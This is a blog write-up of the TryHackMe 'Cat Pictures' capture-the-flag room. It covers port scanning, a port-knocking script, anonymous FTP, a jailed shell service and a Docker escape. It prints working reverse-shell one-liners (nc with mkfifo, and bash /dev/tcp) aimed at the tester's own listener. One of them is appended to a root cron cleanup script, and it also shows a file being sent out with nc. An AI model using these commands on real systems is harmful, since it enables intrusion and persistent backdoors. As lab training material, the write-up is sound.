---
layout: post
title: "Cat Pictures - Write-up - TryHackMe"
lang: en
categories:
  - writeups
tags:
  - security
  - writeups
  - thm
  - eop
  - web
  - jail
  - ftp
  - shell
  - system
  - docker
date: 2021/07/26 21:49:00
thumbnail: /images/TryHackMe/catpictures.jpeg
authorId: noraj
toc: true
---
# Information

## Room

- **Name:** Cat Pictures
- **Profile:** [tryhackme.com](https://tryhackme.com/room/catpictures)
- **Difficulty:** Easy
- **Description**: I made a forum where you can post cute cat pictures!

![Cat Pictures](/images/TryHackMe/catpictures.jpeg)

# Write-up

## Overview

Install tools used in this WU on BlackArch Linux:

```
$ sudo pacman -S nmap
```

## Network enumeration

Port and service scan with nmap:

```
# Nmap 7.91 scan initiated Mon Jul 26 11:24:16 2021 as: nmap -sSVC -p- -oA nmap_full -v -T 4 10.10.39.43
Nmap scan report for 10.10.39.43
Host is up (0.031s latency).
Not shown: 65531 closed ports
PORT     STATE    SERVICE      VERSION
21/tcp   filtered ftp
22/tcp   open     ssh          OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 37:43:64:80:d3:5a:74:62:81:b7:80:6b:1a:23:d8:4a (RSA)
|   256 53:c6:82:ef:d2:77:33:ef:c1:3d:9c:15:13:54:0e:b2 (ECDSA)
|_  256 ba:97:c3:23:d4:f2:cc:08:2c:e1:2b:30:06:18:95:41 (ED25519)
2375/tcp filtered docker
4420/tcp open     nvm-express?
| fingerprint-strings:
|   DNSVersionBindReqTCP, GenericLines, GetRequest, HTTPOptions, RTSPRequest:
|     INTERNAL SHELL SERVICE
|     please note: cd commands do not work at the moment, the developers are fixing it at the moment.
|     ctrl-c
|     Please enter password:
|     Invalid password...
|     Connection Closed
|   NULL, RPCCheck:
|     INTERNAL SHELL SERVICE
|     please note: cd commands do not work at the moment, the developers are fixing it at the moment.
|     ctrl-c
|_    Please enter password:
8080/tcp open     http         Apache httpd 2.4.46 ((Unix) OpenSSL/1.1.1d PHP/7.3.27)
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
| http-open-proxy: Potentially OPEN proxy.
|_Methods supported:CONNECTION
|_http-server-header: Apache/2.4.46 (Unix) OpenSSL/1.1.1d PHP/7.3.27
|_http-title: Cat Pictures - Index page
```

Let's add a local domain:

```
$ grep cat /etc/hosts
10.10.39.43 catpictures.thm
```

## Service discovery

We found an unusual service on port 4420, let's try to connect to it.

```
$ telnet catpictures.thm 4420
Trying 10.10.39.43...
Connected to 10.10.39.43.
Escape character is '^]'.
INTERNAL SHELL SERVICE
please note: cd commands do not work at the moment, the developers are fixing it at the moment.
do not use ctrl-c
Please enter password:
password
Invalid password...
Connection Closed
Connection closed by foreign host.
```

Right now we don't have credentials so let's try the web service instead.

## Web discovery

http://catpictures.thm:8080/ is hosting a phpBB forum.

If the doc folder was properly updated, http://catpictures.thm:8080/docs/CHANGELOG.html
should leak the version og phpBB, so it could be using phpBB 3.3.3.

At the time the last release is phpBB 3.3.4 so 3.3.3 is unlikely vulnerable.
We must rather look for information.

There is only one forum post: http://catpictures.thm:8080/viewtopic.php?f=2&t=2

> POST ALL YOUR CAT PICTURES HERE :)
>
> Knock knock! Magic numbers: 1111, 2222, 3333, 4444

It's a hint giving us a [Port knocking](https://en.wikipedia.org/wiki/Port_knocking)
combo to try.

## Port knocking

We can look at [Rubyfu](https://rubyfu.net/module-0x3-or-network-kung-fu/ruby-socket#port-knocking)
to find how to write a simple Port knocking script in ruby.

```ruby
require 'socket'

ports = [1111, 2222, 3333, 4444]

ports.each do |port|
  puts "[+] Port: #{port}"
  sleep 1
  begin
    s = TCPSocket.new '10.10.39.43', port
    s.close
  rescue Errno::ECONNREFUSED, Errno::EHOSTUNREACH
    next
  end
end
```

It's actually a script I wrote for [The Great Escape - Write-up - TryHackMe](https://blog.raw.pm/en/TryHackMe-The-Great-Escape-write-up/#Port-knocking) and submitted to Rubyfu.

Let's run it:

```
$ ruby portk.rb
[+] Port: 1111
[+] Port: 2222
[+] Port: 3333
[+] Port: 4444
```

Now if scan ports again, we'll see the FTP port is open:

```
$ sudo nmap -sS 10.10.39.43 -p- -v -T 4
PORT     STATE    SERVICE
21/tcp   open     ftp
22/tcp   open     ssh
2375/tcp filtered docker
4420/tcp open     nvm-express
8080/tcp open     http-proxy
```

## FTP discovery

We can connect to the FTP server anonymously and retrieve the only file.

```
$ ftp catpictures.thm
Connected to catpictures.thm.
220 (vsFTPd 3.0.3)
Name (catpictures.thm:noraj): anonymous
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-r--r--    1 ftp      ftp           162 Apr 02 14:32 note.txt
226 Directory send OK.
ftp> get note.txt
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for note.txt (162 bytes).
226 Transfer complete.
162 bytes received in 3,2e-05 seconds (4,83 Mbytes/s)
ftp> quit
221 Goodbye.

$ cat note.txt
In case I forget my password, I'm leaving a pointer to the internal shell service on the server.

Connect to port 4420, the password is s<edited>t.
- catlover
```

## Internal Shell Service (4420)

We should now be able to connect to the shell service.

Note: connecting with `telnet` won't work while connecting with `ncat` or `nc` will work.

```
$ ncat catpictures.thm 4420
INTERNAL SHELL SERVICE
please note: cd commands do not work at the moment, the developers are fixing it at the moment.
do not use ctrl-c
Please enter password:
s<edited>t
Password accepted
ls -lhA
total 48K
-rw------- 1 1001 1001   50 Apr  1 20:23 .bash_history
-rw-r--r-- 1 1001 1001  220 Apr  1 20:21 .bash_logout
-rw-r--r-- 1 1001 1001 3.7K Apr  1 20:21 .bashrc
-rw-r--r-- 1 1001 1001  807 Apr  1 20:21 .profile
drwxrwxr-x 2 1001 1001 4.0K Apr  2 23:05 bin
drwxr-xr-x 2    0    0 4.0K Apr  1 20:32 etc
drwxr-xr-x 3    0    0 4.0K Apr  2 20:51 home
drwxr-xr-x 3    0    0 4.0K Apr  2 22:53 lib
drwxr-xr-x 2    0    0 4.0K Apr  1 20:28 lib64
drwxr-xr-x 2    0    0 4.0K Apr  2 20:56 opt
drwxr-xr-x 2    0    0 4.0K Apr  3 01:35 tmp
drwxr-xr-x 4    0    0 4.0K Apr  2 22:43 usr
pwd
/

id
/bin/sh: 1: id: not found

whoami
/bin/sh: 1: whoami: not found

echo $PATH
/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin

echo $TERM

echo $SHELL

cat .bash_history
mkdir bin
exit
cp /bin/bash bin/
ls -alt bin
exit
```

It looks like we are in a chroot or a jail. So let's try to escape it.

```
ls bin
bash
cat
echo
ls
nc
rm
sh

ls usr/bin
mkfifo
touch
wget
```

We can see we have `nc` and `mkfifo`, let's check [revshells.com](https://www.revshells.com/)
and use the `nc mkfifo` technique.

```
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|bash -i 2>&1|nc 10.9.19.77 9001 >/tmp/f
```

On our listener:

```
$ ncat -lvnp 9001
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::9001
Ncat: Listening on 0.0.0.0:9001
Ncat: Connection from 10.10.39.43.
Ncat: Connection from 10.10.39.43:38828.
bash: cannot set terminal process group (1609): Inappropriate ioctl for device
bash: no job control in this shell
I have no name!@cat-pictures:/# echo $SHELL
echo $SHELL
/bin/sh
I have no name!@cat-pictures:/# echo $TERM
echo $TERM
dumb
```

## Escape the jail

There is a weird binary here:

```
I have no name!@cat-pictures:/# ls -lhA /home/catlover
ls -lhA /home/catlover
total 20K
-rwxr-xr-x 1 0 0 19K Apr  3 01:35 runme
```

It's password protected and the password we used previously doesn't work here.

Has we don't have much commands available on the server, let's retrieve the binary.

```
I have no name!@cat-pictures:/# nc -N 10.9.19.77 9001 < /home/catlover/runme
```

```
$
...
r<edited>a
Please enter yout password:
Welcome, catlover! SSH key transfer queued!
touch /tmp/gibmethesshkey
Access Denied
...
```

We can use the password on the `runme` service and it copies us a SSH private
key.

Fix the permissions:

```
$ chmod 600 id_rsa_catlover
```

Connect over SSH.

```
$ ssh catlover@catpictures.thm -i id_rsa_catlover
...
root@7546fa2336d6:/# id
uid=0(root) gid=0(root) groups=0(root)
```

## System enumeration

Now we have escaped to the docker container, we know we run in one because of
`/.dockerenv`.

So we will probably have to escape the container to the host.

By the way let's loot the 1st flag:

```
root@7546fa2336d6:/# cat /root/flag.txt
```

Running LinPEAS show us an uncommon script: `/opt/clean/clean.sh`.

The content is useless for us but we can edit it.

```
root@7546fa2336d6:/# cat /opt/clean/clean.sh
#!/bin/bash

rm -rf /tmp/*
root@7546fa2336d6:/# ls -lh /opt/clean/clean.sh
-rw-r--r-- 1 root root 27 May  1 00:20 /opt/clean/clean.sh
```

## Elevation of Privilege (EoP): escape docker container

I'm to lazy to run pspy and see if it's called fro ma cron job, I'll rather modify
it and wait.

Let's add a reverse shell to the script.

```
root@7546fa2336d6:/# echo 'bash -i >& /dev/tcp/10.9.19.77/9001 0>&1' >> /opt/clean/clean.sh
```

```
$ ncat -lvnp 9001
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::9001
Ncat: Listening on 0.0.0.0:9001
Ncat: Connection from 10.10.39.43.
Ncat: Connection from 10.10.39.43:38832.
bash: cannot set terminal process group (2698): Inappropriate ioctl for device
bash: no job control in this shell
root@cat-pictures:~# id
id
uid=0(root) gid=0(root) groups=0(root)
root@cat-pictures:~# ls -lhA
ls -lhA
total 52K
lrwxrwxrwx 1 root root    9 Mar 24 13:14 .bash_history -> /dev/null
-rw-r--r-- 1 root root 3.1K Apr  9  2018 .bashrc
drwx------ 3 root root 4.0K Mar 31 19:44 .cache
drwx------ 3 root root 4.0K Mar 24 11:40 .config
drwxr-xr-x 2 root root 4.0K Apr  2 17:37 firewall
drwx------ 3 root root 4.0K Mar 24 11:34 .gnupg
-rw------- 1 root root   28 Apr  2 15:57 .lesshst
drwxr-xr-x 3 root root 4.0K Mar 24 11:23 .local
-rw-r--r-- 1 root root  148 Aug 17  2015 .profile
-rw------- 1 root root   45 Mar 31 19:49 .python_history
-rw-r--r-- 1 root root   73 Mar 25 09:29 root.txt
-rw-r--r-- 1 root root   66 Mar 25 09:14 .selected_editor
drwx------ 2 root root 4.0K Mar 25 12:31 .ssh
-rw-r--r-- 1 root root  168 Apr  2 14:06 .wget-hsts
root@cat-pictures:~# cat root.txt
cat root.txt
Congrats!!!
Here is your flag:
```
